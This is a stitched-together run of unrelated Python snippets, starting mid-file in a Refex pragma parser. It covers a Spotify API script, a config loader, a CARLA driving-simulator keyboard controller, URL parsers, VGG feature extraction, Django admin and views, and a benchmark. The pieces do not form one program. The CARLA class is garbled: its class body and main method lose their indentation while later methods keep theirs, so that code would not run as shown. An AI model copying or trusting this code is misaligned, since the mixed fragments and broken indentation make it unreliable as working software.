(?:,\s*)? # trailing comma allowed, to try to be maximally permissive.
\Z
""", re.VERBOSE)
@attr.s(frozen=True)
class Pragma(object):
  """A pragma / directive for Refex to alter how it handles files.
  Attributes:
    tag: The pragma namespace. This should be ``"refex"`` unless the pragma is
      actually parsed from a comment that targets another system (e.g. pylint.)
    data: The pragma payload, a set of key-value pairs.
    start: The start (codepoint offset) of the pragma in the file. Inclusive.
    end: The end (codepoint offset) of the pragma in the file. Exclusive.
  """
  tag = attr.ib(type=str)
  data = attr.ib(type=Mapping[str, str])
  start = attr.ib(type=int)
  end = attr.ib(type=int)

  @classmethod
  def from_text(cls, text, start, end) -> Optional["Pragma"]:
    """Parses pragmas from the standard format: ``tag: key=value, ...``.
    For example, ``refex: disable=foo`` becomes
    ``Pragma(tag=refex, data={"disable": "foo"}, ...)``
    Arbitrary leading text (usually an explanation of why the pragma was
    used) is permitted, but the pragma itself must end the string.
    Args:
      text: The candidate pragma text.
      start: The start offset for the pragma.
      end: The end offset for the pragma.
    Returns:
      A :class:`Pragma` if text[start:end] parses as a pragma, otherwise
      ``None``.
    """
    match = _PRAGMA_RE.search(text)
    if match is None:
      return None
    # Split the payload into key=value declarations and strip whitespace.
    declarations = (decl.partition('=') for decl in match.group('data').split(','))
    data = {key.strip(): value.strip() for key, _, value in declarations}
    return cls(tag=match.group('tag'), data=data, start=start, end=end)
|
'''
Given an array of integers nums and an integer k, determine whether there are two distinct indices i and j in the array where nums[i] = nums[j] and the absolute difference between i and j is less than or equal to k.
Example
For nums = [0, 1, 2, 3, 5, 2] and k = 3, the output should be
containsCloseNums(nums, k) = true.
There are two 2s in nums, and the absolute difference between their positions is exactly 3.
For nums = [0, 1, 2, 3, 5, 2] and k = 2, the output should be
containsCloseNums(nums, k) = false.
The absolute difference between the positions of the two 2s is 3, which is more than k.
Input/Output
[execution time limit] 4 seconds (py3)
[input] array.integer nums
Guaranteed constraints:
0 ≤ nums.length ≤ 55000,
-2^31 - 1 ≤ nums[i] ≤ 2^31 - 1.
[input] integer k
Guaranteed constraints:
0 ≤ k ≤ 35000.
[output] boolean
'''
def containsCloseNums(nums, k):
    """Return True if some value occurs twice at most k positions apart.

    Keeps, for every value seen so far, the most recent index at which it
    appeared; a repeat within the window triggers an early True.
    """
    last_index = {}
    for position, value in enumerate(nums):
        if value in last_index and position - last_index[value] <= k:
            return True
        last_index[value] = position
    return False
|
import spotipy
from spotipy.oauth2 import SpotifyOAuth
import os
from secret import *
# Spotipy reads its OAuth credentials from these environment variables;
# clientId/clientSecret come from the local `secret` module.
os.environ["SPOTIPY_CLIENT_ID"] = clientId
os.environ["SPOTIPY_CLIENT_SECRET"] = clientSecret
os.environ["SPOTIPY_REDIRECT_URI"] = "https://open.spotify.com/"
# Read-only access to the user's saved ("liked") tracks.
scope = "user-library-read"
# NOTE(review): hard-coded account id — parameterize if this is reused.
username = '1146603936'
auth_user = SpotifyOAuth(scope=scope, username=username)
# Reuse a cached token if one exists (avoids re-prompting in the browser).
auth_user.get_cached_token()
sp = spotipy.Spotify(auth_manager=auth_user)
# Print the first page of saved tracks as "index artist – title".
results = sp.current_user_saved_tracks()
for idx, item in enumerate(results['items']):
    track = item['track']
    print(idx, track['artists'][0]['name'], " – ", track['name'])
|
import os
import storage
def _readConfig(f):
    """Load a JSON config, returning an empty container if it can't be read.

    NOTE(review): `f` is passed in as a *path string* by the callers below,
    so `storage.json` presumably wraps the stdlib json module with
    path-opening behaviour — confirm against the storage module. Also note
    the IOError fallback returns a list while callers membership-test it
    like a dict (both support `in`, but an empty dict would be clearer).
    """
    try:
        return storage.json.load(f)
    except IOError:
        return []
# All config files live next to this module.
dir_path = os.path.dirname(os.path.realpath(__file__))
# Layered configuration: runtime overrides > user config > shipped defaults.
defaultConfig = _readConfig(dir_path + '/config_default.json')
userConfig = _readConfig(dir_path + '/config.json')
overrides = {}
# File name of main data store
def log():
    return _getConfigValue('log') + ".yaml"
# File name of txt for exporting
def export():
    return _getConfigValue('export')
# Repository to sync worktimes to
def syncRepoUrl():
    return _getConfigValue('sync_repo_url')
def syncRepoBranch():
    return _getConfigValue('sync_repo_branch')
def autoSync():
    return _getConfigValue("sync_automatically")
# Print notices to macOS notification center as well as shell
def notifications():
    return _getConfigValue('notifications')
def hoursPerDay():
    return _getConfigValue('hours_per_day')
# Send an iMessage to a contact when ending a timer
def imessage():
    return _getConfigValue('imessage')
def imessage_address():
    return _getConfigValue('imessage_address')
def imessage_text():
    return _getConfigValue('imessage_text')
# TextBar mode (http://richsomerfield.com/apps/textbar/)
def textbar():
    return _getConfigValue('textbar')
def default_category():
    return _getConfigValue('default_category')
def categories():
    return _getConfigValue('categories')
# Absolute paths derived from the module directory and configured file names.
def log_path():
    return dir_path + "/" + log()
def export_path():
    return dir_path + '/' + export()
# Spreadsheet templates used when exporting.
def xlsx_template():
    return _getConfigValue('xlsx_template')
def ods_template():
    return _getConfigValue('ods_template')
def _getConfigValue(s):
    """Resolve config key `s` with precedence: overrides, then the user
    config, then the shipped defaults; raise if no layer defines it."""
    for layer in (overrides, userConfig, defaultConfig):
        if s in layer:
            return layer[s]
    raise ValueError('Config value %s missing' % s)
|
"""
Welcome to CARLA manual control.
Use ARROWS or WASD keys for control.
W : throttle
S : brake
A/D : steer left/right
Q : toggle reverse
Space : hand-brake
P : toggle autopilot
M : toggle manual transmission
,/. : gear up/down
L : toggle next light type
SHIFT + L : toggle high beam
Z/X : toggle right/left blinker
I : toggle interior light
TAB : change sensor position
[1-9] : change to sensor [1-9]
G : toggle radar visualization
R : toggle recording images to disk
CTRL + R : toggle recording of simulation (replacing any previous)
F1 : toggle HUD
ESC : quit
"""
import pygame
from pygame.locals import KMOD_CTRL
from pygame.locals import KMOD_SHIFT
from pygame.locals import K_0
from pygame.locals import K_9
from pygame.locals import K_COMMA
from pygame.locals import K_DOWN
from pygame.locals import K_ESCAPE
from pygame.locals import K_F1
from pygame.locals import K_LEFT
from pygame.locals import K_PERIOD
from pygame.locals import K_RIGHT
from pygame.locals import K_SLASH
from pygame.locals import K_SPACE
from pygame.locals import K_TAB
from pygame.locals import K_UP
from pygame.locals import K_a
from pygame.locals import K_g
from pygame.locals import K_d
from pygame.locals import K_h
from pygame.locals import K_m
from pygame.locals import K_p
from pygame.locals import K_q
from pygame.locals import K_r
from pygame.locals import K_s
from pygame.locals import K_w
from pygame.locals import K_l
from pygame.locals import K_i
from pygame.locals import K_z
from pygame.locals import K_x
from typing import Tuple
import logging
import carla
from ROAR_Sim.configurations.configuration import Configuration as CarlaConfig
class KeyboardControl(object):
"""Class that handles keyboard input."""
def __init__(self, world, carla_setting: CarlaConfig):
self.logger = logging.getLogger(__name__)
if carla_setting.print_keyboard_hint:
print(__doc__)
print()
if isinstance(world.player, carla.Vehicle):
self._control = carla.VehicleControl()
self._lights = carla.VehicleLightState.NONE
world.player.set_light_state(self._lights)
elif isinstance(world.player, carla.Walker):
self._control = carla.WalkerControl()
self._rotation = world.player.get_transform().rotation
else:
raise NotImplementedError("Actor type not supported")
self._steer_cache = 0.0
self.logger.debug("Keyboard Control initiated")
def parse_events(self, client, world, clock) -> \
Tuple[bool, carla.VehicleControl]:
"""
Parse keyboard press.
:param client: carla.Client
:param world: carla.Client
:param clock: pygame clock
:return:
bool - True if should continue, aka no exit key was pressed
control - carla.VehicleControl
"""
if isinstance(self._control, carla.VehicleControl):
current_lights = self._lights
for event in pygame.event.get():
if event.type == pygame.QUIT:
return False, None
elif event.type == pygame.KEYUP:
if self._is_quit_shortcut(event.key):
return False, None
elif event.key == K_F1:
world.hud.toggle_info()
elif event.key == K_h or (
event.key == K_SLASH and pygame.key.get_mods() & KMOD_SHIFT
):
world.hud.help.toggle()
elif event.key == K_TAB:
world.camera_manager.toggle_camera()
elif event.key == K_g:
world.toggle_radar()
elif event.key > K_0 and event.key <= K_9:
world.camera_manager.set_sensor(event.key - 1 - K_0)
elif event.key == K_r and not (pygame.key.get_mods() & KMOD_CTRL):
world.camera_manager.toggle_recording()
elif event.key == K_r:
if world.recording_enabled:
client.stop_recorder()
world.recording_enabled = False
world.hud.notification("Recorder is OFF")
else:
client.start_recorder("manual_recording.rec")
world.recording_enabled = True
world.hud.notification("Recorder is ON")
if isinstance(self._control, carla.VehicleControl):
if event.key == K_q:
self._control.gear = 1 if self._control.reverse else -1
elif event.key == K_m:
self._control.manual_gear_shift = (
not self._control.manual_gear_shift
)
self._control.gear = world.player.get_control().gear
world.hud.notification(
"%s Transmission"
% (
"Manual"
if self._control.manual_gear_shift
else "Automatic"
)
)
elif self._control.manual_gear_shift and event.key == K_COMMA:
self._control.gear = max(-1, self._control.gear - 1)
elif self._control.manual_gear_shift and event.key == K_PERIOD:
self._control.gear = self._control.gear + 1
elif event.key == K_l and pygame.key.get_mods() & KMOD_CTRL:
current_lights ^= carla.VehicleLightState.Special1
elif event.key == K_l and pygame.key.get_mods() & KMOD_SHIFT:
current_lights ^= carla.VehicleLightState.HighBeam
elif event.key == K_l:
# Use 'L' key to switch between lights:
# closed -> position -> low beam -> fog
if not self._lights & carla.VehicleLightState.Position:
world.hud.notification("Position lights")
current_lights |= carla.VehicleLightState.Position
else:
world.hud.notification("Low beam lights")
current_lights |= carla.VehicleLightState.LowBeam
if self._lights & carla.VehicleLightState.LowBeam:
world.hud.notification("Fog lights")
current_lights |= carla.VehicleLightState.Fog
if self._lights & carla.VehicleLightState.Fog:
world.hud.notification("Lights off")
current_lights ^= carla.VehicleLightState.Position
current_lights ^= carla.VehicleLightState.LowBeam
current_lights ^= carla.VehicleLightState.Fog
elif event.key == K_i:
current_lights ^= carla.VehicleLightState.Interior
elif event.key == K_z:
current_lights ^= carla.VehicleLightState.LeftBlinker
elif event.key == K_x:
current_lights ^= carla.VehicleLightState.RightBlinker
if isinstance(self._control, carla.VehicleControl):
self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
self._control.reverse = self._control.gear < 0
# Set automatic control-related vehicle lights
if self._control.brake:
current_lights |= carla.VehicleLightState.Brake
else: # Remove the Brake flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Brake
if self._control.reverse:
current_lights |= carla.VehicleLightState.Reverse
else: # Remove the Reverse flag
current_lights &= carla.VehicleLightState.All ^ carla.VehicleLightState.Reverse
if current_lights != self._lights: # Change the light state only if necessary
self._lights = current_lights
world.player.set_light_state(carla.VehicleLightState(self._lights))
elif isinstance(self._control, carla.WalkerControl):
self._parse_walker_keys(pygame.key.get_pressed(), clock.get_time(), world)
return True, self._control
# world.player.apply_control(self._control)
# self._parse_vehicle_keys(pygame.key.get_pressed(), clock.get_time())
# return True, self._control
def _parse_vehicle_keys(self, keys, milliseconds):
    """Update self._control (throttle/brake/steer/hand brake) from keyboard state.

    `keys` is the pygame pressed-key sequence; `milliseconds` is the frame
    time and scales the steering increment so steering speed is frame-rate
    independent.
    """
    accelerating = keys[K_UP] or keys[K_w]
    self._control.throttle = min(self._control.throttle + 0.01, 1) if accelerating else 0.0
    if keys[K_DOWN] or keys[K_s]:
        self._control.brake = min(self._control.brake + 0.2, 1)
    else:
        self._control.brake = 0
    steer_increment = 5e-4 * milliseconds
    if keys[K_LEFT] or keys[K_a]:
        # When reversing steering direction, snap through zero first.
        self._steer_cache = 0 if self._steer_cache > 0 else self._steer_cache - steer_increment
    elif keys[K_RIGHT] or keys[K_d]:
        self._steer_cache = 0 if self._steer_cache < 0 else self._steer_cache + steer_increment
    else:
        self._steer_cache = 0.0
    # Clamp to [-0.7, 0.7] and quantize to one decimal for the controller.
    self._steer_cache = min(0.7, max(-0.7, self._steer_cache))
    self._control.steer = round(self._steer_cache, 1)
    self._control.hand_brake = keys[K_SPACE]
def _parse_walker_keys(self, keys, milliseconds, world):
    """Translate keyboard state into walker speed, heading and jump."""
    self._control.speed = 0.0
    if keys[K_DOWN] or keys[K_s]:
        self._control.speed = 0.0
    turn = 0.08 * milliseconds  # frame-time scaled yaw step
    if keys[K_LEFT] or keys[K_a]:
        self._control.speed = 0.01
        self._rotation.yaw -= turn
    if keys[K_RIGHT] or keys[K_d]:
        self._control.speed = 0.01
        self._rotation.yaw += turn
    if keys[K_UP] or keys[K_w]:
        # Shift sprints; otherwise walk at the normal maximum speed.
        sprinting = pygame.key.get_mods() & KMOD_SHIFT
        self._control.speed = (
            world.player_max_speed_fast if sprinting else world.player_max_speed
        )
    self._control.jump = keys[K_SPACE]
    self._rotation.yaw = round(self._rotation.yaw, 1)
    self._control.direction = self._rotation.get_forward_vector()
@staticmethod
def _is_quit_shortcut(key):
    """Return truthy for the quit shortcuts: ESC, or Ctrl+Q."""
    if key == K_ESCAPE:
        return True
    return key == K_q and pygame.key.get_mods() & KMOD_CTRL
|
import logging
from tweesky.parser.html_parser import HtmlParser
from tweesky.parser.spotify_parser import SpotifyTrack, SpotifyAlbum, SpotifyArtist, SpotifyEpisode, SpotifyPlaylist, \
SpotifyShow
def get_parser(url=None, html=None):
    """Return the parser appropriate for *url*.

    Spotify URLs are dispatched to the dedicated Spotify handlers; anything
    else — including a missing URL with pre-fetched *html* — falls back to
    the generic HTML parser.
    """
    # BUG FIX: url defaults to None, and `'...' in None` raises TypeError;
    # guard before the substring test so html-only calls work.
    if url and 'open.spotify.com' in url:
        return get_spotify_handler(url)
    return HtmlParser(url, html)
def get_spotify_handler(url):
    """Map an open.spotify.com URL to its typed parser.

    Logs an error and returns None when no handler matches.
    """
    dispatch = (
        ('open.spotify.com/album/', SpotifyAlbum),
        ('open.spotify.com/track/', SpotifyTrack),
        ('open.spotify.com/artist/', SpotifyArtist),
        ('open.spotify.com/show/', SpotifyShow),
        ('open.spotify.com/episode/', SpotifyEpisode),
        ('open.spotify.com/playlist/', SpotifyPlaylist),
    )
    for fragment, handler_cls in dispatch:
        if fragment in url:
            return handler_cls(url)
    logging.error(f"Handler not found for {url}")
|
import pandas as pd

# Load the scraped tweets.
tweets_df = pd.read_csv('tweets.csv')

# Timestamp strings live in the 'created_at' column.
tweet_time = tweets_df['created_at']

# Keep the HH:MM:SS slice, but only for rows whose seconds field reads '19'.
tweet_clock_time = []
for entry in tweet_time:
    if entry[17:19] == '19':
        tweet_clock_time.append(entry[11:19])

# Print the extracted times
print(tweet_clock_time)
|
import os
from importlib import import_module
def get_all_features(module=None):
    """Collect the ``Feature`` class from every plugin file in ``features/<module>/``.

    Stale ``.pyc`` files are deleted first, then every regular ``*.py`` file
    (except dunder files such as ``__init__.py``) is imported and its
    ``Feature`` attribute collected.

    Returns a list of the collected ``Feature`` classes.
    """
    all_values = []
    files = ['features/'+module+'/'+name for name in os.listdir('./features/'+module)]
    # Remove stale compiled files so they do not linger on disk.
    for fname in files:
        if fname.endswith('.pyc'):
            os.remove(fname)
    for filename in files:
        # BUG FIX: the old test `'.py' not in filename` also matched '.pyc'
        # entries, so each plugin was imported twice (once for the deleted
        # .pyc path); endswith('.py') is exact.
        if not filename.endswith('.py') or '__' in filename:
            continue
        module_name = filename.split('/')[-1].split('.')[0]
        class_module = import_module('features.' + module + '.' + module_name)
        all_values.append(getattr(class_module, 'Feature'))
    return all_values
|
"""handles feature extraction"""
# rewrite of https://github.com/leelabcnbc/tang-paper-2017/blob/master/tang_2017/feature_extraction.py
from torchvision.models import vgg16, vgg16_bn, vgg19, vgg19_bn
from leelabtoolbox.feature_extraction.cnn import (cnnsizehelper, generic_network_definitions)
from leelabtoolbox.preprocessing import pipeline
from collections import defaultdict, OrderedDict
from torch import nn
from torch.autograd import Variable
from functools import partial
from skimage.transform import rescale
import numpy as np
from torch.utils.data import TensorDataset, DataLoader
from torch import FloatTensor
import h5py
def blobinfo():
    """Build the caffe-blob-name <-> torchvision-module-name tables for VGG nets.

    In torchvision's VGG ``features`` sequential, each conv block occupies
    2 modules (conv, relu) in the plain nets and 3 (conv, bn, relu) in the
    ``_bn`` variants; every stage ends with one max-pool module.  Conv blobs
    map to the index of their ReLU output, pool blobs to the pooling module
    itself; fc6/fc7 sit at fixed positions inside ``classifier``.

    Returns (forward, reverse) dicts keyed by net name; values are
    OrderedDicts preserving layer order.
    """
    # Convs per stage: VGG16 = 2-2-3-3-3, VGG19 = 2-2-4-4-4.
    convs_per_stage = {'vgg16': (2, 2, 3, 3, 3), 'vgg19': (2, 2, 4, 4, 4)}
    blob_corresponding_info_inner = dict()
    for base_name, stages in convs_per_stage.items():
        for use_bn in (False, True):
            net_name = base_name + ('_bn' if use_bn else '')
            modules_per_conv = 3 if use_bn else 2
            table = OrderedDict()
            idx = 0  # modules of `features` consumed so far
            for stage, num_convs in enumerate(stages, start=1):
                for conv in range(1, num_convs + 1):
                    idx += modules_per_conv
                    # the blob is the ReLU output: last module of the conv block
                    table[f'conv{stage}_{conv}'] = f'features.{idx - 1}'
                idx += 1  # the max-pool closing the stage
                table[f'pool{stage}'] = f'features.{idx - 1}'
            # fully-connected blobs live in `classifier` at fixed offsets
            table['fc6'] = 'classifier.1'
            table['fc7'] = 'classifier.4'
            blob_corresponding_info_inner[net_name] = table
    # reverse lookup: pytorch module name -> caffe-style blob name
    blob_corresponding_reverse_info_inner = dict()
    for net_name, net_info in blob_corresponding_info_inner.items():
        reverse_table = OrderedDict((y, x) for x, y in net_info.items())
        # module names must be unique within a net for the reverse map to be total
        assert len(reverse_table) == len(net_info)
        blob_corresponding_reverse_info_inner[net_name] = reverse_table
    return blob_corresponding_info_inner, blob_corresponding_reverse_info_inner
# Module-level lookup tables: caffe-style blob name -> pytorch module name,
# and the reverse mapping, one entry per supported VGG variant.
blob_corresponding_info, blob_corresponding_reverse_info = blobinfo()
def get_one_network_meta(net_name, ec_size=22, blobs_to_extract=None):
    """Collect per-network metadata for feature extraction.

    Returns (size helper, slice dict, blobs to extract, pytorch->caffe name
    function) for *net_name*; *ec_size* is the side of the centered crop in
    input coordinates (22 is the original setting — images are rescaled to
    2/3 of the original, which was marginally better for RSA analysis).
    """
    if blobs_to_extract is None:
        blobs_to_extract = list(blob_corresponding_info[net_name].keys())
    # '_bn' variants share size metadata with their plain counterpart.
    net_name_for_check = net_name[:-3] if net_name.endswith('_bn') else net_name
    input_size = generic_network_definitions.input_size_info[net_name_for_check]
    blob_info = generic_network_definitions.blob_info[net_name_for_check]
    helper_this = cnnsizehelper.CNNSizeHelper(blob_info, input_size)
    # Centered ec_size x ec_size window in input coordinates.
    half = ec_size / 2
    top_bottom = input_size[0] / 2 - half, input_size[0] / 2 + half
    left_right = input_size[1] / 2 - half, input_size[1] / 2 + half
    # Blobs without spatial metadata fall back to "take everything".
    slicing_dict = defaultdict(lambda: ((None, None), (None, None)))
    for layer in helper_this.layer_info_dict:
        slicing_dict[layer] = helper_this.compute_minimum_coverage(layer, top_bottom, left_right)
    slicing_dict = cnnsizehelper.get_slice_dict(slicing_dict, blobs_to_extract=blobs_to_extract)

    def correspondence_func(x):
        # None when the pytorch module has no caffe-style counterpart.
        return blob_corresponding_reverse_info[net_name].get(x, None)

    return helper_this, slicing_dict, blobs_to_extract, correspondence_func
def get_pretrained_network(net_name):
    """Instantiate a pretrained torchvision VGG by name, switched to eval mode.

    Kept on CPU on purpose (see the commented-out ``.cuda()`` in history);
    callers move it to the device they want.
    """
    constructors = {'vgg16': vgg16, 'vgg19': vgg19,
                    'vgg16_bn': vgg16_bn, 'vgg19_bn': vgg19_bn}
    net = constructors[net_name](pretrained=True)
    # a.cuda()
    return net.eval()
def _forward_hook(m, in_, out_, module_name, callback_dict, slice_this):
assert isinstance(out_, Variable)
data_all = out_.data.cpu().numpy()
# then slice it
slice_r, slice_c = slice_this
if data_all.ndim == 4:
data_this_to_use = data_all[:, :, slice_r, slice_c]
else:
assert data_all.ndim == 2
data_this_to_use = data_all
# print(f'{data_all.shape} -> {data_this_to_use.shape}')
# extra copy to guard against weird things.
callback_dict[module_name]['output'].append(data_this_to_use.copy())
def augment_module_pre(net: nn.Module, module_names: set, module_correspondence=None, slice_dict=None) -> (dict, list):
    """Register forward hooks capturing (sliced) outputs of selected modules.

    *module_correspondence* maps internal PyTorch module names to the
    standard (Caffe-style) names used in *module_names* and *slice_dict*.
    Returns (callback_dict, remove_handles): the dict that hooks fill at
    forward time, and a zero-argument function detaching all hooks.
    """
    if module_correspondence is None:
        # identity mapping: use PyTorch names as-is
        module_correspondence = lambda x_: x_
    callback_dict = OrderedDict()  # not necessarily ordered, but aids readability
    handles = []
    for torch_name, module in net.named_modules():
        std_name = module_correspondence(torch_name)
        if std_name not in module_names:
            continue
        callback_dict[std_name] = {'output': []}
        hook = partial(_forward_hook, module_name=std_name,
                       callback_dict=callback_dict, slice_this=slice_dict[std_name])
        handles.append(module.register_forward_hook(hook))

    def remove_handles():
        for h in handles:
            h.remove()

    return callback_dict, remove_handles
def preprocess_dataset(images, bgcolor, input_size, rescale_ratio=None):
    """Rescale/pad images onto a canvas and normalize for torchvision VGG.

    *images* must hold values in [0, 1]; grayscale stacks are replicated to
    three channels.  Returns a float32 NCHW array normalized with the
    ImageNet mean/std (see http://pytorch.org/docs/master/torchvision/models.html).
    """
    if rescale_ratio is not None:
        images = np.asarray([rescale(im, scale=rescale_ratio, order=1, mode='edge')
                             for im in images])
    # grayscale (N, H, W) -> fake RGB by channel replication
    if images.ndim == 3:
        images = np.concatenate((images[..., np.newaxis],) * 3, axis=-1)
    assert images.ndim == 4 and images.shape[-1] == 3
    assert np.all(images <= 1) and np.all(images >= 0)
    # paste each image onto a constant-color canvas of the network input size
    steps_naive = ['putInCanvas']
    pars_naive = {'putInCanvas': {'canvas_size': input_size,
                                  'canvas_color': bgcolor}}
    pipeline_naive, _realpars, _order = pipeline.preprocessing_pipeline(
        steps_naive, pars_naive, order=steps_naive)
    images_new = pipeline_naive.transform(images.astype(np.float32, copy=False))
    # ImageNet normalization
    images_new -= np.array([0.485, 0.456, 0.406])
    images_new /= np.array([0.229, 0.224, 0.225])
    # NHWC -> NCHW
    return np.transpose(images_new, (0, 3, 1, 2))
def extract_features_one_case(net, dataset_preprocessed, blobs_to_extract, correspondence_func, slicing_dict,
                              batch_size, verbose=True):
    """Run *net* over the preprocessed dataset and collect hooked activations.

    Returns an OrderedDict mapping blob name -> activations stacked over all
    batches.  Requires a CUDA device (inputs are moved to the GPU).
    """
    callback_dict, remove_handles = augment_module_pre(net, blobs_to_extract,
                                                       module_correspondence=correspondence_func,
                                                       slice_dict=slicing_dict)
    # dummy zero targets: TensorDataset wants parallel tensors
    targets = FloatTensor(np.zeros(len(dataset_preprocessed), dtype=np.float32))
    loader_this = DataLoader(TensorDataset(FloatTensor(dataset_preprocessed), targets),
                             batch_size=batch_size)
    for batch_idx, (inputs, _) in enumerate(loader_this):
        # volatile=True -> pure inference mode (legacy autograd API)
        net(Variable(inputs.cuda(), volatile=True))
        if verbose and (batch_idx + 1) % 20 == 0:
            print(f'[{batch_idx}/{len(loader_this)}]')
    # collect what the hooks gathered
    features_all = OrderedDict()
    for blob_name, blob in callback_dict.items():
        features_all[blob_name] = np.concatenate(blob['output'])
        if verbose:
            print(blob_name, features_all[blob_name].shape)
    del callback_dict  # maybe save some memory
    remove_handles()   # detach the forward hooks
    return features_all
def process_one_case_wrapper(net_name_this, net_this, dataset_np_this, grp_name,
                             setting_this, bg_color, batch_size, file_to_save_input, file_to_save_feature):
    """Preprocess one dataset, extract its CNN features, and cache both in HDF5.

    Both HDF5 files act as caches keyed by *grp_name*: work whose group
    already exists is never recomputed.
    """
    (helper_this, slicing_dict,
     blobs_to_extract, correspondence_func) = get_one_network_meta(net_name_this, setting_this['ec_size'])
    print(grp_name, blobs_to_extract)
    # BUG FIX: h5py.File() without an explicit mode relied on the old 'a'
    # default, which is deprecated and an error in h5py >= 3; pass 'a'
    # (read/write, create if missing) to keep the original behavior.
    with h5py.File(file_to_save_feature, 'a') as f_feature:
        if grp_name not in f_feature:
            # then preproces dataset
            # wrap this in hdf5, so that loading can be a lot faster.
            # for why `ascontiguousarray`, see <https://discuss.pytorch.org/t/problem-with-reading-pfm-image/2924>
            with h5py.File(file_to_save_input, 'a') as f_input:
                if grp_name not in f_input:
                    dataset_preprocessed = preprocess_dataset(dataset_np_this, bg_color,
                                                              input_size=helper_this.input_size,
                                                              rescale_ratio=setting_this['scale'])
                    f_input.create_dataset(grp_name, data=dataset_preprocessed, compression="gzip")
                    f_input.flush()
                    print(f'{grp_name} input computation done')
                else:
                    dataset_preprocessed = f_input[grp_name][...]
                    print(f'{grp_name} input computation done before')
            dataset_preprocessed = np.ascontiguousarray(dataset_preprocessed)
            print(dataset_preprocessed.shape)
            features_all = extract_features_one_case(net_this, dataset_preprocessed,
                                                     blobs_to_extract, correspondence_func, slicing_dict, batch_size)
            # datasets are stored by blob index; the names go into group attrs below
            for blob_idx, blob_data in enumerate(features_all.values()):
                f_feature.create_dataset(f'{grp_name}/{blob_idx}', data=blob_data, compression="gzip")
                f_feature.flush()
            print(f'{grp_name} feature extraction done')
            # save blob names
            f_feature[grp_name].attrs['blobs_to_extract'] = np.array([np.string_(x) for x in blobs_to_extract])
        else:
            print(f'{grp_name} feature extraction done before')
|
from DataUtil import *

if __name__ == '__main__':
    image_paths = getAllImageData()
    # Report how many files were found per imagery source/year,
    # in the same fixed order as before.
    for source in ('naip_2013', 'naip_2017',
                   'nlcd_2013', 'nlcd_2016',
                   'landsat_2013', 'landsat_2014', 'landsat_2015',
                   'landsat_2016', 'landsat_2017'):
        print(len(image_paths[source]))
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from time import strftime
from django.contrib import admin
from django.contrib.admin import AdminSite
from book.models import book
from django.utils.translation import ugettext_lazy as _
class bookAdmin(admin.ModelAdmin):
    """Mostly read-only admin for book objects.

    Adds a reverse row ordinal (``ids``) and a constant edit-link column
    (``modifyText``); adding new objects through the admin is disabled.
    """
    # title = models.CharField("分类名称",max_length=100,db_index=True,unique=True)
    def get_queryset(self, request):
        # Cache the queryset on the instance so ids() can compute row order.
        # NOTE(review): ModelAdmin instances are shared across requests, so
        # storing per-request state here is not thread-safe — confirm the
        # deployment is effectively single-threaded.
        qs = super(bookAdmin, self).get_queryset(request)
        self.qs = qs
        return qs
    def ids(self, obj):
        # Reverse ordinal of the row within the cached queryset
        # (1 for the last row); materializes the queryset on every call.
        return len(self.qs) - list(self.qs).index(obj)
    ids.short_description = "順序"
    def modifyText(self, obj):
        # Constant link text for the second list_display link column.
        return "修改"
    modifyText.short_description = "修改鏈接"
    list_max_show_all = 20
    list_display = ('ids', 'name', 'remoteIP', 'location', 'chapterCount', "idReader_id", 'status', 'accountCreateTime', "accountStatus", "modifyText")
    search_fields = ('name', 'idReader_id')
    radio_fields = {"status": admin.VERTICAL}
    readonly_fields = ('id', 'remoteIP', 'location', 'chapterCount', "idReader_id", "createTime")
    list_display_links = ('ids', 'modifyText')
    view_on_site = True
    # forbid adding new object
    def has_add_permission(self, request):
        return False
    def has_change_permission(self, request, obj=None):
        # NOTE: both branches currently allow access; kept as an explicit
        # hook so list-page vs change-page access can be tightened later.
        if obj is None:
            return True  # allow the change-list page
        else:
            return True  # allow the change-object page
# Register your models here.
admin.site.register(book, bookAdmin)
|
from django.http import HttpResponse
from django.shortcuts import get_object_or_404, render

from blog.models import Post
# Create your views here.
# index view
# Create your views here.
# index view
def index(request):
    """Render the blog index with every post."""
    context = {
        # templates access the queryset under the 'posts' name
        'posts': Post.objects.all(),
    }
    return render(request, 'blog/index.html', context=context)
def post_detail(request, pk):
    """Render a single post; unknown pks produce a 404 instead of a 500."""
    # BUG FIX: Post.objects.get(pk=pk) raised Post.DoesNotExist (an HTTP 500)
    # for bad pks; get_object_or_404 converts that into a proper 404 page.
    selected_post = get_object_or_404(Post, pk=pk)
    posts_data = {
        'post_in_detail': selected_post,
    }
    return render(request, 'blog/post_detail.html', context=posts_data)
|
import numpy as np
import pandas as pd
import timeit
import itertools
from typing import List, IO
from numpy import int8, int64, ndarray
from numpy import uint8 # type: ignore[attr-defined]
import binascii
# Micro-benchmarks comparing ways to read, hex-encode/decode and accumulate
# observation data.  Winning variants are kept live; losing alternatives are
# left commented out with their measured times for reference.  Requires the
# fixture files db1.csv / db10.csv / db100.csv in the working directory.
loops = 1000
t = 0.0 # type:float
# read 10 lines as bytes: 15us (winner)
def readfile1():
    # type: () -> List[bytes]
    with open('db10.csv', 'rb') as datafile: # type: IO[bytes]
        return datafile.readlines()
t = timeit.timeit(readfile1,number=loops)
print(f'readfile1 rb 10 elapsed time: {1e6*t/loops} us')
# read 10 lines as string: 23 (loser)
#def readfile3():
# # type: () -> List[str]
# with open('db10.csv', 'r') as datafile: # type: IO[str]
# return datafile.readlines()
#t = timeit.timeit(readfile3,number=loops)
#print(f'readfile3 r 10 elapsed time: {1e6*t/loops} us')
# read 100 lines as bytes: 91us (winner)
def readfile2():
    # type: () -> List[bytes]
    with open('db100.csv', 'rb') as datafile: # type: IO[bytes]
        return datafile.readlines()
t = timeit.timeit(readfile2,number=loops)
print(f'readfile2 rb 100 elapsed time: {1e6*t/loops} us')
# read 100 lines as string: 104us (loser)
#def readfile4():
# # type: () -> List[str]
# with open('db100.csv', 'r') as datafile: # type: IO[str]
# return datafile.readlines()
#t = timeit.timeit(readfile4,number=loops)
#print(f'readfile4 r 100 elapsed time: {1e6*t/loops} us')
# very slow, 2300 us
#def readfile6() -> pd.DataFrame:
# return pd.read_csv('db100.csv', delim_whitespace=True, header=None,
# names=['one','two','three','four'])
#t = timeit.timeit(readfile6,number=loops)
#print(f'readfile6 pd 100 elapsed time: {1e6*t/loops} us')
# Synthetic observations: int8 noise shifted into the uint8 range so it can
# be packed into raw bytes for the hex benchmarks below.
observations = np.random.normal(0,30,1000).astype(int8) # type: ndarray[int8]
unsigned_observations = (observations+128).astype(uint8) # type: ndarray[uint8]
